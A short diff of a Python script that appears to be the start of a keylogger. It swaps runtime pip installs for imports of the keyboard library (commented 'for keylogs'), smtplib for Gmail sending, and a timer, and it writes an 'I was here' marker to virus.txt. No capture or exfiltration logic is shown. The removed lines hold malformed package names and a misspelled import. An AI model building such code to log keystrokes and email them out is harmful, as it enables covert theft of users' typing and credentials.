@@ -1,15 +1,13 @@
-from datetime import datetime
-import subprocess, sys
-
-process = subprocess.check_call([sys.executable, '-m', 'pip', 'install','keyboard'])
-process = subprocess.check_call([sys.executable, '-m', 'pip', 'install','smtplib>'])
-process = subprocess.check_call([sys.executable, '-m', 'pip', 'install','MIMEMultipart>'])
-process = subprocess.check_call([sys.executable, '-m', 'pip', 'install','MIMEText>'])
-
+import keyboard # for keylogs
+import smtplib # for sending email using SMTP protocol (gmail)
+from threading import Timer
 from datetime import datetime
 from email.mime.multipart import MIMEMultipart
 from email.mime.text import MIMEText
-import stmplib
+
+#import subprocess, sys
+# process = subprocess.check_call([sys.executable, '-m', 'pip', 'install','keyboard'])
+# print(process)
 
 with open("./virus.txt", "w", encoding="utf-8") as buffer:
     buffer.write(f"I was here at {datetime.now()} ;>")
